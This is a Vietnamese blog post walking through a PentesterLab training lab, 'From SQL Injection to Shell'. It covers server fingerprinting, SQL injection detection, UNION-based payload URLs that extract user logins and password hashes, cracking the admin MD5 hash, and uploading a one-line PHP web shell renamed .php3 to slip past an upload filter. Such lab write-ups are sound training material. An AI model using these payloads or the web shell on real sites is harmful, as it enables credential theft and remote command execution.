By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
FantasistaFantasista
  • Home
  • Network
  • System
  • Software
  • Security
    SecurityShow More
    Hướng dẫn chung về Kali Linux
    27/05/2022
    Ransomware tấn công có chủ đích vào các tổ chức
    03/11/2021
    Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding
    04/10/2021
    Series Pentesterlab – Day 21: From SQL Injection to Shell
    15/09/2021
    Series Tryhackme – Day 01: Starting Out In Cyber Sec
    13/09/2021
  • Coding
  • Life
Search
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Reading: Series Pentesterlab – Day 21: From SQL Injection to Shell
Share
Sign In
Notification Show More
Latest News
Hướng dẫn chung về Kali Linux
27/05/2022
Ransomware tấn công có chủ đích vào các tổ chức
03/11/2021
Hướng dẫn kích hoạt IDM Full không cần crack, sử dụng key an toàn
10/10/2021
Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding
04/10/2021
Series Pentesterlab – Day 21: From SQL Injection to Shell
15/09/2021
Aa
FantasistaFantasista
Aa
Search
Have an existing account? Sign In
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Fantasista > Blog > Fantasista > Bảo mật > Pentest > Series Pentesterlab – Day 21: From SQL Injection to Shell
Bảo mậtPentest

Series Pentesterlab – Day 21: From SQL Injection to Shell

Fantasista
Fantasista 15/09/2021
Updated 2021/10/03 at 11:09 Chiều
Share
4 Min Read
SHARE
Mục lục
Giới thiệuFingerprintingDetect và exploit SQL InjectionSolution

Giới thiệu

Khóa học này trình bày chi tiết việc khai thác SQL injection trong một trang web dựa trên PHP và cách kẻ tấn công có thể sử dụng nó để truy cập vào các trang quản trị.
Sau đó, bằng cách sử dụng quyền truy cập này, kẻ tấn công sẽ có thể thực thi mã trên máy chủ.

Cuộc tấn công được chia thành 3 bước:

Fingerprinting: để thu thập thông tin về ứng dụng web và các công nghệ đang được sử dụng.
Phát hiện và khai thác SQL injection: trong phần này, bạn sẽ tìm hiểu cách thức hoạt động của SQL injection và cách khai thác chúng để truy xuất thông tin.
Truy cập vào các trang quản trị và thực thi mã: bước cuối cùng bạn sẽ truy cập vào hệ điều hành và chạy các lệnh.

Fingerprinting

Fingerprinting có thể được thực hiện bằng nhiều công cụ. Trước tiên, bằng cách sử dụng trình duyệt, có thể phát hiện ra rằng ứng dụng được viết bằng PHP.

Kiểm tra tiêu đề HTTP

Nhiều thông tin có thể được truy xuất bằng cách kết nối với ứng dụng web bằng netcat hoặc telnet:

1
$ telnet vulnerable 80

Với: vulnerable là tên máy chủ hoặc địa chỉ IP của máy chủ;
80 là cổng TCP được ứng dụng web sử dụng (80 là giá trị mặc định cho HTTP).

Bằng cách gửi yêu cầu HTTP sau:

1
2
GET / HTTP/1.1
Host: vulnerable

Có thể truy xuất thông tin về phiên bản PHP và máy chủ web được sử dụng chỉ bằng cách quan sát các tiêu đề HTTP do máy chủ gửi lại:

1
2
3
4
5
6
7
8
9
10
HTTP/1.1 200 OK
Date: Thu, 24 Nov 2011 04:40:51 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze3
Vary: Accept-Encoding
Content-Length: 1335
Content-Type: text/html
 
<html>
<head>

Ở đây ứng dụng chỉ áp dụng qua HTTP (không có gì đang chạy trên cổng 443). Nếu ứng dụng chỉ khả dụng qua HTTPs, telnet hoặc netcat sẽ không thể giao tiếp với máy chủ, thì công cụ openssl có thể được sử dụng:

1
openssl s_client -connect vulnerable:443

Với :
vulnerable là tên máy chủ hoặc địa chỉ IP của máy chủ;
443 là cổng TCP được ứng dụng web sử dụng (443 là giá trị mặc định cho các HTTP)

Sử dụng một ứng dụng như Burp Suite http://portswigger.net/ được thiết lập làm proxy giúp dễ dàng truy xuất cùng một thông tin:

burp headers - Series Pentesterlab – Day 21: From SQL Injection to Shell

Sử dụng Buster để khám phá các thư mục trong website

 

Detect và exploit SQL Injection

Detect SQL Injection

Giới thiệu SQL

Câu lệnh cơ bản nhất:

1
SELECT column1, column2, column3 FROM table1 WHERE column4='string1' AND column5=integer1 AND column6=integer2;

Detect dựa trên Integer

Ví dụ với đường dẫn URL /cat.php?id=1

Khi bạn thử id=2-1 mà hiển thị article 1, hay id=2-0 mà hiển thị article 2, nghĩa là phép tính được thực thi luôn khi get link, điều này có thể tồn tại lỗ hổng SQL Injection

Nếu kết quả id=2-1 hay 2-0 mà vẫn ra article 2, thì ko có lỗ hổng để khai thác

Detect dựa vào String

Chính là phép so sánh luôn đúng huyền thoại sau:

' and '1'='1

Solution

https://ptl-60156166-d599eb20.libcurl.so/cat.php?id=1%20union%20select%201,password,3,4%20from%20users

https://ptl-60156166-d599eb20.libcurl.so/cat.php?id=1%20union%20select%201,concat(login,%27:%27,password),3,4%20from%20users

Pasted 31 - Series Pentesterlab – Day 21: From SQL Injection to Shell

 

Sử dụng MD5 để decode password admin:

Pasted 32 - Series Pentesterlab – Day 21: From SQL Injection to Shell

Sau đó đăng nhập vào admin, upload file test.php3 để pass qua (nếu đặt test.php sẽ bị chặn)

Nội dung file là:

<?php
system($_GET[‘cmd’]);
?>

Sau đó vào đường dẫn file đó:

https://ptl-60156166-d599eb20.libcurl.so/admin/uploads/test.php3?cmd=/usr/local/bin/score%2078a02cad-6b9e-4f38-8b26-2176490366c0

You Might Also Like

Hướng dẫn chung về Kali Linux

Ransomware tấn công có chủ đích vào các tổ chức

Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding

Series Tryhackme – Day 01: Starting Out In Cyber Sec

Series Pentesterlab – Day 20: JSON Web Token

TAGGED: pentest, pentesterlab

Sign Up For Daily Newsletter

Be keep up! Get the latest breaking news delivered straight to your inbox.
By signing up, you agree to our Terms of Use and acknowledge the data practices in our Privacy Policy. You may unsubscribe at any time.
Fantasista 15/09/2021
Share this Article
Facebook TwitterEmail Copy Link Print
Share
Posted by Fantasista
Follow:
Xin chào, mình là Tân. Mình tạo blog này 01/06/2021. Đây là nơi mình ghi chép lại những suy nghĩ, cảm nhận trong cuộc sống và những kiến thức mà mình học được.
Previous Article Series Tryhackme – Day 01: Starting Out In Cyber Sec
Next Article Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding
Leave a comment Leave a comment

Trả lời Hủy

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Stay Connected

235.3k Followers Like
69.1k Followers Follow
11.6k Followers Pin
56.4k Followers Follow
136k Subscribers Subscribe
4.4k Followers Follow
- Advertisement -
Ad imageAd image

Latest News

Hướng dẫn chung về Kali Linux
Bảo mật Công cụ bảo mật 27/05/2022
Ransomware tấn công có chủ đích vào các tổ chức
An toàn thông tin Bảo mật 03/11/2021
Hướng dẫn kích hoạt IDM Full không cần crack, sử dụng key an toàn
Phần mềm Tiện ích 10/10/2021
Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding
Bảo mật Pentest 04/10/2021
https://pbs.twimg.com/profile_images/1542611508093661184/MR5LYGqH_normal.jpg
@envato
1.5k Following
71k Followers
https://pbs.twimg.com/profile_images/1542611508093661184/MR5LYGqH_normal.jpg 8 giờ ago
@barts_ron Hi! Thanks for contacting us. It looks like all our systems are running smoothly. You can check the stat… https://t.co/Haz9yXFnMM
https://pbs.twimg.com/profile_images/1542611508093661184/MR5LYGqH_normal.jpg 15 giờ ago
@NeilEvansRocks Thank you for reaching out. I am happy to answer general questions here. For more personalized assi… https://t.co/KG3fxSwwXS
https://pbs.twimg.com/profile_images/1542611508093661184/MR5LYGqH_normal.jpg Mar 26, 2023
@olaarrh Hi there, to continue we would need you to submit a help ticket since we will be dealing with sensitive ac… https://t.co/sbSNJf6LC7

You Might also Like

Hướng dẫn chung về Kali Linux

27/05/2022
An toàn thông tinBảo mật

Ransomware tấn công có chủ đích vào các tổ chức

03/11/2021
Bảo mậtPentest

Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding

04/10/2021
Bảo mật

Series Tryhackme – Day 01: Starting Out In Cyber Sec

13/09/2021
//

We influence 20 million users and is the number one business and technology news network on the planet

Quick Link

  • About
  • Contact
  • FAQs

Top Categories

  • Home
  • Network
  • System
  • Software
  • Security
  • Coding
  • Life
FantasistaFantasista
Follow US

© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.

Join Us!

Subscribe to our newsletter and never miss our latest news, podcasts etc..

Zero spam, Unsubscribe at any time.

Removed from reading list

Undo
Welcome Back!

Sign in to your account

Register Lost your password?